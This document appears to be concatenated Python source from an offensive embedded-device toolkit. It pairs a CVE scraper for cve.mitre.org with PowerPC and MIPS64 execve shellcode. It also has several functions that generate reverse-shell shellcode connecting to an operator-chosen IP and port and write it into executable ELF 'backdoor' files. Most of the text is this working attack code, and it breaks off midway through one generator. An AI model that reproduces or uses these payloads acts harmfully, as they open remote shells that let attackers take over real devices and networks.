from pwn import *


def extract_sl_print(source_shellcode,shellcode_for_hex):
	data=enhex(source_shellcode)
	for i in range(len(data)):
		if i%2==0:
			shellcode_for_hex+="\\x"
		shellcode_for_hex+=data[i]
	return shellcode_for_hex



import requests
import re
from colorama import Fore,Back,Style
import os
import argparse
from pwn import *

local_file_flag = 0


def do_get_req(url):
	return requests.get(url, timeout=10).text


def check_dir(model):
	if(os.path.exists('/tmp/hackebds/')):
		pass
	else:
		os.mkdir("/tmp/hackebds")
	if(os.path.exists("/tmp/hackebds/"+model)):
		local_file_flag = 1
		pass
	else:
		os.mkdir("/tmp/hackebds/"+model)

def re_detail(data):
	compil=r'a target="_blank" href="(.*)">MISC:'
	compil1=r'<li><a target="_blank" href="(.*)">URL'
	res1 = re.findall(compil1,data)
	res = re.findall(compil,data)

	#print(requests.get(res[0]).text)
	return res + res1

def save_file(model,data):
	'''
	判断路径是否存在os.path.exit
	'''
	with open("/tmp/hackebds/%s/CVElist"%(model),'w') as f:
		#f.write("DIR-816: \n\n")
		for i in range(len(data)):
			f.write(data[i][1]+": "+data[i][2]+"\n\n")

def get_local_file(model):
	with open("/tmp/hackebds/%s/CVElist"%(model),'r') as f:
		data= f.read()
		if data == None:
			log.error("localfile is NuLL")
			return
	data = data.split("\n\n")
	for i in range(len(data)):
		try:
			data[i] = data[i].split(": ")
			print(Fore.RED+data[i][0]+": "+Fore.GREEN+data[i][1]+"\n"+Fore.RESET)
		except:
			pass



def get_detail(url):
	url = "https://cve.mitre.org"+url
	#print(url)
	res= re_detail(requests.get(url).text)
	return res

def parseCVE(model):

	#global information_2021
	try:
		result = do_get_req("https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword="+model)
		compil=r'<td valign="top" nowrap="nowrap"><a href="(.*)">(.*)</a></td>\n.*>(.*)'
		compil1=r'<td valign="top">(.*)\n'
		aim=re.findall(compil,result)
		if len(aim)==0:
			print(Fore.RED+"nothing")
			exit()
		for i in range(len(aim)):
		#print(aim[i][0])
		#get_detail(aim[i][0])
			print(Fore.RED+aim[i][1]+": "+Fore.GREEN+aim[i][2]+"\n"+Fore.BLUE+"link: "+str(get_detail(aim[i][0])))
		save_file(model, aim)
	#get_detail(aim[0][0])
	except Exception as e:
		log.info("fail to connect cve.mitre.org, readinf localfile")
		get_local_file(model)


def main(model):
	#parser = argparse.ArgumentParser("This tool is convenient for CVE search of equipment")
	#parser.add_argument('-model', required=True, type=str,default=None, help='device model')
	#args = parser.parse_args()
	check_dir(model)
	parseCVE(model)
	#save_file(model, cveinfo_data)


if __name__  == "__main__":
	#parser = argparse.ArgumentParser()
	#parser.add_argument('-model', required=True, type=str,default=None, help='Learning module')
	main()




'''
res=requests.get("https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=TL-WDR5620").text
#save_file(parseCVE(res))
print(parseCVE(res))
'''


from pwn import *
class ESH():
	def __init__(self):
		#print("demo")
		log.info("arch is "+context.arch)
		log.info("endian is "+context.endian)
		log.info("bits is "+str(context.bits))

	def sh(self):
		if (context.arch == 'powerpc' or context.arch == 'powerpc64') and context.endian == 'big' and context.bits == 32:
			shellcode_execve='''
	        /* execve(path='/bin/sh', argv=['sh'], envp=0) */
	        lis    r9, 0x2f62
	        ori    r9, r9, 26990
            stw   r9, 48(r31)
            xor  r9, r9, r9
            lis    r9, 0x2f73
            ori   r9, r9, 26624
            stw   r9, 52(r31)
            addi  r3, r31,0x30
            stwu  r3, 0(r31)
            mr    r4, r31
            xor   r5, r5, r5
            li    r0, 0xb
            sc
			'''
			return shellcode_execve

		if context.arch == 'mips64' and context.endian == 'big' and context.bits == 64:
			shellcode_execve='''
			/* execve(path='/bin/sh', argv=['sh'], envp=0) */
			lui     $t1, 0x2f62
			ori     $t1, $t1, 0x696e
			sw      $t1, -8($sp)
			lui     $t9, 0xd08c
			ori     $t9, $t9, 0x97ff
			nor     $t1, $t9, $zero
			sw      $t1, -4($sp)
			daddiu   $sp, $sp, -8
			dadd     $a0, $sp, $zero
			lui     $t1, 0x2f62
			ori     $t1, $t1, 0x696e
			sw      $t1, -12($sp)
			lui     $t9, 0xd08c
			ori     $t9, $t9, 0x97ff
			nor     $t1, $t9, $zero
			sw      $t1, -8($sp)
			sw      $zero, -4($sp)
			daddiu   $sp, $sp, -12
			slti    $a1, $zero, -1
			sd      $a1, -8($sp)
			daddi    $sp, $sp, -8
			li      $t9, -9
			nor     $a1, $t9, $zero
			dadd     $a1, $sp, $a1
			sd      $a1, -8($sp)
			daddi    $sp, $sp, -8
			dadd     $a1, $sp, $zero
			slti    $a2, $zero, -1
			li      $v0,0x13c1
			syscall 0x40404
			'''
			return shellcode_execve

		if context.arch == 'mips64' and context.endian == 'little' and context.bits == 64:
			shellcode_execve = '''
			/* execve(path='/bin/sh', argv=['sh'], envp=0) */
			lui     $t1, 0x6e69
			ori     $t1, $t1, 0x622f
			sw      $t1, -8($sp)
			lui     $t9, 0xff97
			ori     $t9, $t9, 0x8cd0
			nor     $t1, $t9, $zero
			sw      $t1, -4($sp)
			daddiu   $sp, $sp, -8
			dadd     $a0, $sp, $zero
			lui     $t1, 0x6e69
			ori     $t1, $t1, 0x622f
			sw      $t1,-12($sp)
			lui     $t9, 0xff97
			ori     $t9, $t9, 0x8cd0
			nor     $t1, $t9, $zero
			sw      $t1, -8($sp)
			sw      $zero, -4($sp)
			daddiu   $sp, $sp, -12
			slti    $a1, $zero, -1
			sd      $a1, -8($sp)
			daddi    $sp, $sp, -8
			li      $t9, -9
			nor     $a1, $t9, $zero
			dadd     $a1, $sp, $a1
			sd      $a1, -8($sp)
			daddi    $sp, $sp, -8
			dadd     $a1, $sp, $zero
			slti    $a2, $zero, -1
			li      $v0, 0x13c1
			syscall 0x40404
			'''
			return shellcode_execve

		else:
			log.info("Please set correct assembly schema information(pwerpc or mips64(el))")



from pwn import *
from . import extract_shellcode
from colorama import Fore,Back,Style
from . import my_package
import string



'''
11.10 add powerpc reverse backdoor
execve 0xb
socket 0x146
connect 0x148
dup2   0x3f
bind 0x147
accept 0x14a
'''

def powerpc_backdoor(shell_path ,reverse_ip, reverse_port, envp ,filename = None):
	context.arch = 'powerpc'
	context.endian = 'big'
	context.bits = '32'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port='0x'+enhex(p16(reverse_port))
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	sth   r9, 30(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	'''
	if shell_path == "/bin/sh" or shell_path == "sh":
		shellcode += '''
		lis    9, 0x2f62
		ori    9, 9, 26990
		stw    9, 48(31)
		xor    9, 9, 9
		lis    9, 0x2f73
		ori    9, 9, 26624
		stw    9, 52(31)
		lis    9, 0x2d69
		stw    9, 60(31)
		addi   3, 31,0x30
		stwu   3, 0(31)
		addi   11, 31,60
		stwu   11, 4(31)
		addi   4, 31, -4
		xor    5, 5, 5
		li     0, 0xb
		sc
		'''
	elif shell_path == "/bin/bash" or shell_path == "bash":
		shellcode += '''
		lis    9, 0x2f62
		ori    9, 9, 26990
		stw    9, 48(31)
		xor    9, 9, 9
		lis    9, 0x2f62
		ori    9, 9, 24947
		stw    9, 52(31)
		lis    9, 0x6800
		ori    9, 9, 0
		stw    9, 56(31)
		lis    9, 0x2d69
		stw    9, 60(31)
		addi   3, 31,0x30
		stwu   3, 0(31)
		addi   11, 31,60
		stwu   11, 4(31)
		addi   4, 31, -4
		xor    5, 5, 5
		li     0, 0xb
		sc
		'''
	else:
		log.info("now shell is only support sh and bash")
		return 
	if (envp == None):
		envp = 0
	else:
		envp = my_package.get_envir_args(envp)
	shellcode = asm(shellcode%(handle_port, handle_ip_0, handle_ip_1, handle_ip_2, handle_ip_3))
	ELF_data = make_elf(shellcode)
	if(filename==None):
		log.info("waiting 3s")
		sleep(1)
		filename=filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,my_package.chars)
		f=open(filename,"wb")
		f.write(ELF_data)
		f.close()
		os.chmod(filename, 0o755)
		log.success("{} is ok in current path ./".format(filename))
		context.arch = 'i386'
		context.bits = "32"
		context.endian = "little"
	else:
		if(os.path.exists(filename) != True):
			log.info("waiting 3s")
			sleep(1)
			f=open(filename,"wb")
			f.write(ELF_data)
			f.close()
			os.chmod(filename, 0o755)
			log.success("{} generated successfully".format(filename))
			context.arch='i386'
			context.bits="32"
			context.endian="little"
		else:
			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
			choise = input()
			if choise == "y\n" or choise == "\n":
				log.info("waiting 3s")
				sleep(1)
				f=open(filename,"wb")
				f.write(ELF_data)
				f.close()
				os.chmod(filename, 0o755)
				log.success("{} generated successfully".format(filename))
				context.arch='i386'
				context.bits="32"
				context.endian="little"
			else:
				return 


def ppc_reverse_sl(reverse_ip, reverse_port, filename = None):
	context.arch = 'powerpc'
	context.endian = 'big'
	context.bits = '32'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port='0x'+enhex(p16(reverse_port))
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	sth   r9, 30(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	li    r9, 0x2f62
	sth   r9, 48(r31)
	li    r9, 0x696e
	sth   r9, 50(r31)
	li    r9, 0x2f73
	sth   r9, 52(r31)
	li    r9, 0x6800
	sth   r9, 54(r31)
	addi  r3, r31,0x30
	stwu  r3, 0(r31)
	mr    r4, r31
	xor   r5, r5, r5
	li    r0, 0xb
	sc
	'''
	shellcode = shellcode%(handle_port, handle_ip_0, handle_ip_1, handle_ip_2, handle_ip_3)
	shellcode = asm(shellcode)
	shellcode_len=len(shellcode)
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	if "\\x00" in shellcode_hex:
		#log.info("waiting 3s")
		#sleep(1)
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.info("the null byte in %d"%(int(shellcode.index(b"\x00"))))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode
	else:
		#log.info("waiting 3s")
		#sleep(1)
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode

def ppcle_reverse_sl(reverse_ip, reverse_port, filename = None):
	context.arch = 'powerpc'
	context.endian = 'little'
	context.bits = '32'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port_1 = p16(reverse_port)[0]
	handle_port_2 = p16(reverse_port)[1]
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	stb   r9, 30(r31)
	li    r9, %s
	stb   r9, 31(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	lis    r9, 0x6e69
	ori    r9, r9, 0x622f
	stw   r9, 48(r31)
	xor  r9, r9, r9
	lis    r9, 0x68
	ori   r9, r9, 0x732f
	stw   r9, 52(r31)
	addi  r3, r31,0x30
	stwu  r3, 0(r31)
	mr    r4, r31
	xor   r5, r5, r5
	li    r0, 0xb
	sc
	'''
	shellcode = shellcode%(handle_port_2 , handle_port_1, handle_ip_0, handle_ip_2, handle_ip_2, handle_ip_3)
	shellcode = asm(shellcode)
	shellcode_len=len(shellcode)
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	if "\\x00" in shellcode_hex:
		#log.info("waiting 3s")
		#sleep(1)
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.info("the null byte in %d"%(int(shellcode.index(b"\x00"))))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode
	else:
		#log.info("waiting 3s")
		#sleep(1)
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode


def ppc64le_reverse_sl(reverse_ip, reverse_port, filename = None):
	context.arch = 'powerpc64'
	context.endian = 'little'
	context.bits = '64'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port_1 = p16(reverse_port)[0]
	handle_port_2 = p16(reverse_port)[1]
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	stb   r9, 30(r31)
	li    r9, %s
	stb   r9, 31(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	lis    r9, 0x6e69
	ori    r9, r9, 0x622f
	stw   r9, 48(r31)
	xor  r9, r9, r9
	lis    r9, 0x68
	ori   r9, r9, 0x732f
	stw   r9, 52(r31)
	addi  r3, r31,0x30
	std  r3, 0(r31)
	mr    r4, r31
	xor   r5, r5, r5
	li    r0, 0xb
	sc
	'''
	shellcode = shellcode%(handle_port_2 , handle_port_1, handle_ip_0, handle_ip_2, handle_ip_2, handle_ip_3)
	shellcode = asm(shellcode)
	shellcode_len=len(shellcode)
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	if "\\x00" in shellcode_hex:
		#log.info("waiting 3s")
		#sleep(1)
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.info("the null byte idx in %d"%(int(shellcode.index(b"\x00"))))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode
	else:
		#log.info("waiting 3s")
		#sleep(1)
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode



'''
can't exame it 
'''

def powerpcle_backdoor(shell_path ,reverse_ip, reverse_port, envp ,filename=None):
	context.arch = 'powerpc'
	context.endian = 'little'
	context.bits = '32'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port_1 = p16(reverse_port)[0]
	handle_port_2 = p16(reverse_port)[1]
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	stb   r9, 30(r31)
	li    r9, %s
	stb   r9, 31(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	'''

	if shell_path == "/bin/sh" or shell_path == "sh":
		shellcode += '''
		lis    r9, 0x6e69
		ori    r9, r9, 0x622f
		stw   r9, 48(r31)
		xor  r9, r9, r9
		lis    r9, 0x68
		ori   r9, r9, 0x732f
		stw   r9, 52(r31)
		addi  r3, r31,0x30
		stwu  r3, 0(r31)
		xor   r5, r5, r5
		stw   r5, 64(r31)
		lis   r9, 0x692d
		stw   r9, 60(r31)
		addi  r11, r31,62
		stwu  r11, 4(r31)
		addi  r4, r31, -4
		xor   r5, r5, r5
		li    r0, 0xb
		sc
		'''
	elif shell_path == "/bin/bash" or shell_path == "bash":
		shellcode += '''
		lis    r9, 0x6e69
		ori    r9, r9, 0x622f
		stw   r9, 48(r31)
		xor  r9, r9, r9
		lis    r9, 0x7361
		ori   r9, r9, 0x622f
		stw   r9, 52(r31)
		lis    9, 0
		ori   r9, r9, 0x68
		stw    9, 56(31)
		addi  r3, r31,0x30
		stwu  r3, 0(r31)
		xor   r5, r5, r5
		stw   r5, 64(r31)
		lis   r9, 0x692d
		stw   r9, 60(r31)
		addi  r11, r31,62
		stwu  r11, 4(r31)
		addi  r4, r31, -4
		li    r0, 0xb
		sc
		'''
	else:
		log.info("now shell is only support sh and bash")
		return 
	if(envp == None):
		envp = 0
	else:
		envp = my_package.get_envir_args(envp)
	shellcode = asm(shellcode % (handle_port_2,handle_port_1, handle_ip_0, handle_ip_2, handle_ip_2, handle_ip_3))
	ELF_data = make_elf(shellcode)
	if(filename==None):
		log.info("waiting 3s")
		sleep(1)
		filename=filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,my_package.chars)
		f=open(filename,"wb")
		f.write(ELF_data)
		f.close()
		os.chmod(filename, 0o755)
		log.success("{} is ok in current path ./".format(filename))
		context.arch = 'i386'
		context.bits = "32"
		context.endian = "little"
	else:
		if(os.path.exists(filename) != True):
			log.info("waiting 3s")
			sleep(1)
			f=open(filename,"wb")
			f.write(ELF_data)
			f.close()
			os.chmod(filename, 0o755)
			log.success("{} generated successfully".format(filename))
			context.arch='i386'
			context.bits="32"
			context.endian="little"
		else:
			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
			choise = input()
			if choise == "y\n" or choise == "\n":
				log.info("waiting 3s")
				sleep(1)
				f=open(filename,"wb")
				f.write(ELF_data)
				f.close()
				os.chmod(filename, 0o755)
				log.success("{} generated successfully".format(filename))
				context.arch='i386'
				context.bits="32"
				context.endian="little"
			else:
				return 

'''
pwoerpc64 reverse_shell_file 
add 2022.11.12
'''

def powerpc64_backdoor(shell_path ,reverse_ip, reverse_port,envp ,filename=None):
	context.arch = 'powerpc64'
	context.endian = 'big'
	context.bits = '64'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port='0x'+enhex(p16(reverse_port))
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	sth   r9, 30(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	'''
	if shell_path == "/bin/sh" or shell_path == "sh":
		shellcode += '''
		lis    9, 0x2f62
		ori    9, 9, 26990
		stw    9, 48(31)
		xor    9, 9, 9
		lis    9, 0x2f73
		ori    9, 9, 26624
		stw    9, 52(31)
		xor    5, 5, 5
		stw    5, 64(31)
		lis    9, 0x2d69
		stw    9, 60(31)
		addi   3, 31,0x30
		std   3, 0(31)
		addi   11, 31,60
		std   11, 8(31)
		std    5, 16(31)
		mr    4, 31
		li     0, 0xb
		sc
		'''
	elif shell_path == "/bin/bash" or shell_path == "bash":
		shellcode += '''
		lis    9, 0x2f62
		ori    9, 9, 26990
		stw    9, 48(31)
		xor    9, 9, 9
		lis    9, 0x2f62
		ori    9, 9, 24947
		stw    9, 52(31)
		lis    9, 0x6800
		ori    9, 9, 0
		stw    9, 56(31)
		xor    5, 5, 5
		stw    5, 64(31)
		lis    9, 0x2d69
		stw    9, 60(31)
		addi   3, 31,0x30
		std   3, 0(31)
		addi   11, 31,60
		std   11, 8(31)
		std   5,  16(31)
		mr    r4, r31
		li     0, 0xb
		sc
		'''
	else:
		log.info("now shell is only support sh and bash")
		return 
	if(envp == None):
		envp = 0
	else:
		envp = my_package.get_envir_args(envp)
	#print(shellcode%(handle_port, handle_ip_0, handle_ip_1, handle_ip_2, handle_ip_3))
	shellcode = asm(shellcode%(handle_port, handle_ip_0, handle_ip_1, handle_ip_2, handle_ip_3))
	ELF_data = make_elf(shellcode)
	if(filename==None):
		log.info("waiting 3s")
		sleep(1)
		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,my_package.chars)
		f=open(filename,"wb")
		f.write(ELF_data)
		f.close()
		os.chmod(filename, 0o755)
		log.success("{} is ok in current path ./".format(filename))
		context.arch = 'i386'
		context.bits = "32"
		context.endian = "little"
	else:
		if(os.path.exists(filename) != True):
			log.info("waiting 3s")
			sleep(1)
			f=open(filename,"wb")
			f.write(ELF_data)
			f.close()
			os.chmod(filename, 0o755)
			log.success("{} generated successfully".format(filename))
			context.arch='i386'
			context.bits="32"
			context.endian="little"
		else:
			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
			choise = input()
			if choise == "y\n" or choise == "\n":
				log.info("waiting 3s")
				sleep(1)
				f=open(filename,"wb")
				f.write(ELF_data)
				f.close()
				os.chmod(filename, 0o755)
				log.success("{} generated successfully".format(filename))
				context.arch='i386'
				context.bits="32"
				context.endian="little"
			else:
				return 


'''
ip addres need change,
'''

def powerpc64le_backdoor(shell_path, reverse_ip, reverse_port, envp ,filename=None):
	context.arch = 'powerpc64'
	context.endian = 'little'
	context.bits = '64'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port_1 = str(p16(reverse_port)[0])
	handle_port_2 = str(p16(reverse_port)[1])
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	stb   r9, 30(r31)
	li    r9, %s
	stb   r9, 31(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	'''
	if shell_path == "/bin/sh" or shell_path == "sh":
		shellcode += '''
		lis    r9, 0x6e69
		ori    r9, r9, 0x622f
		stw   r9, 48(r31)
		xor  r9, r9, r9
		lis    r9, 0x68
		ori   r9, r9, 0x732f
		stw   r9, 52(r31)
		addi  r3, r31,0x30
		std  r3, 0(r31)
		xor   r5, r5, r5
		stw   r5, 64(r31)
		lis   r9, 0x692d
		stw   r9, 60(r31)
		addi  r11, r31,62
		std  r11, 8(r31)
		std  r5,  16(r31)
		mr   r4, r31
		li    r0, 0xb
		sc
		'''
	elif shell_path == "/bin/bash" or shell_path == "bash":
		shellcode += '''
		lis    r9, 0x6e69
		ori    r9, r9, 0x622f
		stw   r9, 48(r31)
		xor  r9, r9, r9
		lis    r9, 0x7361
		ori   r9, r9, 0x622f
		stw   r9, 52(r31)
		lis    9, 0
		ori   r9, r9, 0x68
		stw    9, 56(31)
		addi  r3, r31,0x30
		std  r3, 0(r31)
		xor   r5, r5, r5
		stw   r5, 64(r31)
		lis   r9, 0x692d
		stw   r9, 60(r31)
		addi  r11, r31,62
		std  r11, 8(r31)
		std  r5, 16(r31)
		mr    r4, r31
		li    r0, 0xb
		sc
		'''
	else:
		log.info("now shell is only support sh and bash")
		return 
	if(envp == None):
		envp = 0
	else:
